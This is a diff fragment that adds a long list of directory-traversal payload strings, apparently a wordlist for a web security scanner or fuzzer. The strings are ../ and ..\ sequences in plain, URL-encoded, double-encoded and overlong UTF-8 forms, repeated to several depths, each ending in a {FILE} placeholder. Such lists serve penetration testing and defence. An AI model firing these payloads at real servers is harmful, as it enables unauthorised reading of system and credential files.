+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
